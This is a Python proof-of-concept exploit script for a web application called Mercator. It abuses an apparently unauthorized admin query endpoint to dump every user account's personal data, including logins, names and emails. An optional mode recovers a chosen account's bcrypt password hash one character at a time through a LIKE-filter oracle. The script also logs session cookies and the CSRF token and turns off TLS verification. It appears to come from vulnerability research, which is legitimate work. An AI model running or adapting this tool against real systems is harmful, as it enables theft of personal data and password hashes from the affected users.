#!/usr/bin/env python3 """ Mercator Query Engine extraction tool. Reads arbitrary models through the ungated POST /admin/queries/execute endpoint (QueryController::execute). Default action: enumerate every user account with its PII (id, login, name, email, granularity). ./bin/python3 query_engine_dump.py --base http://127.0.0.1:8000 \ --user audit --password 'Audit123!' Options: --json emit JSON instead of a table --extract-hash ID also recover the bcrypt password hash of account ID (case-folded: the target column uses a CI collation) """ import argparse import json import re import string import sys import warnings # macOS system Python links LibreSSL; urllib3 v2 emits a one-time # NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter # it before `requests` pulls urllib3 in (disable_warnings() runs too late, # the warning fires at import time). warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL") import requests import urllib3 urllib3.disable_warnings() LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"') CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"') BCRYPT_ALPHABET = "$./" + string.digits + string.ascii_uppercase + string.ascii_lowercase PII_FIELDS = ["id", "login", "name", "email", "granularity"] # ── Shared scaffold (identical across the Mercator exploit scripts) ────────── def log(message): """Status banner — emitted on stderr so stdout stays pure result data.""" print(message, file=sys.stderr) def die(message): log(f"[!] {message}") sys.exit(1) def login(session, base, user, password): """Authenticate, print the login section, and return the CSRF token.""" r = session.get(f"{base}/login", timeout=10) m = LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found on /login") r = session.post( f"{base}/login", data={"_token": m.group(1), "login": user, "password": password}, timeout=10, allow_redirects=True, ) if r.url.rstrip("/").endswith("/login"): die(f"authentication failed for '{user}'") m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found after login") csrf = m.group(1) log("[+] login") log(f" user : {user}") for c in session.cookies: log(f" cookie : {c.name}={c.value}") log(f" csrf token : {csrf}") return csrf # ── Query engine ──────────────────────────────────────────────────────────── def query(session, base, csrf, dsl): """Submit a DSL to the query engine and return the decoded JSON.""" r = session.post( f"{base}/admin/queries/execute", headers={"X-CSRF-TOKEN": csrf, "Accept": "application/json"}, data=dsl, timeout=15, ) if r.status_code != 200: die(f"/admin/queries/execute returned HTTP {r.status_code}") return r.json() def fetch_accounts(session, base, csrf): """Return every user account with its PII fields.""" data = query(session, base, csrf, {"from": "users", "output": "list", "select[]": PII_FIELDS}) return data.get("rows", []) def extract_hash(session, base, csrf, account_id): """Recover an account's bcrypt hash via the filter-side LIKE oracle.""" known = "" while len(known) < 60: match = None for c in BCRYPT_ALPHABET: dsl = { "from": "users", "output": "list", "select[]": ["id"], "filters[0][field]": "id", "filters[0][operator]": "=", "filters[0][value]": str(account_id), "filters[1][field]": "password", "filters[1][operator]": "like", "filters[1][value]": known + c + "%", } if query(session, base, csrf, dsl)["meta"]["count"] >= 1: match = c break if match is None: break known += match return known def render_table(accounts): widths = { f: max([len(f)] + [len(str(a.get(f, ""))) for a in accounts]) for f in PII_FIELDS } row = lambda values: " ".join( str(v).ljust(widths[f]) for f, v in zip(PII_FIELDS, values) ) print(row(PII_FIELDS)) print(" ".join("-" * widths[f] for f in PII_FIELDS)) for a in accounts: print(row([a.get(f, "") for f in PII_FIELDS])) def main(): ap = argparse.ArgumentParser(description="Mercator Query Engine extraction tool") ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL") ap.add_argument("--user", required=True, help="account login") ap.add_argument("--password", required=True) ap.add_argument("--json", action="store_true", help="emit JSON instead of a table") ap.add_argument("--extract-hash", type=int, metavar="ID", help="recover the bcrypt hash of account ID") args = ap.parse_args() session = requests.Session() session.verify = False csrf = login(session, args.base, args.user, args.password) accounts = fetch_accounts(session, args.base, csrf) log(f"[+] {len(accounts)} account(s) extracted from the users model") if args.extract_hash is not None: digest = extract_hash(session, args.base, csrf, args.extract_hash) log(f"[+] account {args.extract_hash} password hash: {digest}") for a in accounts: if a.get("id") == args.extract_hash: a["password_hash"] = digest if args.json: print(json.dumps(accounts, indent=2)) else: render_table(accounts) if __name__ == "__main__": try: main() except KeyboardInterrupt: die("interrupted") except requests.RequestException as e: die(f"could not reach Mercator: {e}")